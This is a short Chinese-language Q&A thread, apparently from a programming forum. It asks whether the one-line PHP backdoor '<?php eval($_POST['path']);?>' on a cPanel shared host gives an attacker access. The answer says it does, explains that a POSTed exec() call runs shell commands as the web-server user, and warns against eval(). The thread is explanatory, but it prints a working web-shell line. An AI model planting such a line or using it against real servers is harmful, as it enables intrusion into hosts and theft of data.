eval php shell hack

NVG*_*NVG 0 php security eval

假设您在带有cPanel的共享Web服务器中找到了此代码.您是否可以通过将shell上传到服务器或通过其他方法来访问邮件附件或cPanel?我不需要步骤如何做到这一点.只是一个整体的想法.对不起,我不能给你更多细节.但是这段代码不是为了攻击任何人.

<?php eval($_POST['path']);?>

Man*_*eld 5

是.

警告

eval()语言构造非常危险,因为它允许执行任意PHP代码.因此不鼓励使用它.如果您已仔细验证除了使用此构造之外没有其他选项,请特别注意不要将任何用户提供的数据传递到其中,而不事先正确验证它.

例如,设置path为以下将运行apache用户有权运行的任何shell命令.

exec("system command here");

  • @nevergone这段代码给你shell访问,期间.任何将其置于生产代码中的人都应当当场解雇. (3认同)